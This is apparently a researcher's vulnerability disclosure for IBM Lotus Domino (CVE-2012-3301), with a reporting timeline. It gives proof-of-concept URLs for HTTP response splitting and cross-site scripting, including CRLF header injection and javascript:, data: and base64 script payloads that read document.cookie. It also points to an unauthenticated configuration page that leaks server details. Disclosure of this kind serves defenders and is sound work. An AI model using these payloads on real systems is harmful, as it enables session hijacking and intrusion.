HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino

I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3301.

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on other vulnerabilities, about which I've informed them.

For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

----------
Details:
----------

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Will work in all versions of Firefox, but without access to cookies:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

Also there can be used Location header for XSS attack (for which there are its own nuances of work in different browsers).

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URI.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

In x.nsf, "x" means username of logged in user.

------------
Timeline:
------------

Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).

XSS (WASC-08):

This XSS in March 2008 worked in such way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since that time vector of attack via javascript: URI was fixed (it's quite
possible that my German client informed IBM in 2008 about multiple holes,
which I found in Domino). But there is a possibility to attack via data: and
vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

At page https://site/domcfg.nsf, which is accessible without authentication,
there is a leakage of information about Web Server Configuration. Such
situation I saw at many sites on Lotus Domino.